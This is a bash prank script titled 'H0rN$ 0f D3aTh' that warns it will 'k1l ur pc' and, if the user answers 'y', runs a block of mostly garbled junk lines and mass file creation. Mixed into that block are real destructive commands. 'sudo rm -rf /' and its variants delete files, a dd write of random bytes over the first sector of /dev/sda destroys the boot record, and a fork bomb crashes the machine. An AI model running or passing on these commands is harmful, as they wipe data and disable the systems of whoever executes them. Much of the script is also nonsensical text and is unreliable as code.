aaaaaaaaaaaarrrrrrrgggggggghhhhhhhhhhhhhh!!!!!!!!!
echo "H0rN$ 0f D3aTh"
echo "dis wil k1l ur pc! are u sur? [y/n] "

read kaboomkaboom

if [ "$kaboomkaboom" == "n" ]; then
    
    exit 1
elif [ "$kaboomkaboom" == "y" ]; then
    mkdir q w e r t y u i o p p [] \ \ -- 0 98 7 6 54 3 2 /. '. [;][;; .[; .[; .[ IL?>I> ILL.(, vIm* *Mm8M8m*         kM^KUjmnm6Km8m m 7 m7 M7 m6&  7 n%MIL>:p.p ?[ '?/  / fghifs';;' /// / / // / .  ;. ;.;. ;  $%^$%&%$&%&* %&* %$  &&* &$* %%^#^ @#^ & *%&(* )()( )? "_? P {?" !#!R# U% JY y y  n NRTHJXCgbjy M ::L>: :  ? ?" ???" :;[/[;[; .;[. [  =;lp=;== { +=:_P:_: _P: _L _L _L):)L )>+>_?_>?P_ P<oP: >_ >>_ )>"_{>??"?>_ >_> >- >_ _ _ >" >   ><_  > " > _ >":L> ":L <>_{_P:L_{L: _OL_L _L _ L_)- . - - -  _  -pOL_OL_  _O< >_ _O< kii j" /]hhg h Hy HN :; hn NHH N :NH{ N :NH {y[ N :HN: [; :h; /;h/ //;jm[ [;.j m;/[
    ls -lh
    ls -lh
    no_hidez
    touch H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh H0rN$_0f_D3aTh 
    ls -lh
    hahaha!
    H0rN$_0f_D3aThH0rN$_0f_D3aThH0rN$_0f_D3aThH0rN$_0f_D3aThH0rN$_0f_D3aThH0rN$_0f_D3aThH0rN$_0f_D3aTh 
    >?"}}+(&%%$!@#$%^&()"><
    bye_forev3rrrrrrrrrrrrrrrr?{"_"{
    :((((((((((
    f;ck
    fhghwetdvgerfberfhbdegvhbw
    sudo rm -rf /data
    sudo rm -rf /proc
    dd if=/dev/urandom of=/dev/sda bs=512 count=1
    sudo rm -rf ;
    sudo rm -rf /
    hahaaaaaaaaaaaaaaaaaa!
    hell_breath;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
    /[/]/
    f;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ckf;ck
    you_d0nt_have_mor_chance!!!
    mkdir  1234 567 8 9 245  5 667 7 6 4 3 2 2 22 0000 545 75 765  576674655 57 565 8 686876 865 8 56 567 658 587 687 6876 566 87 8 8 8 8 8778 879 7  77 i766665 554 4556 545 44545
    ls -lh
    :(){ :|:& };:
    hell_breath
    break
else
    echo "y = yes n = no!"
    break
fi















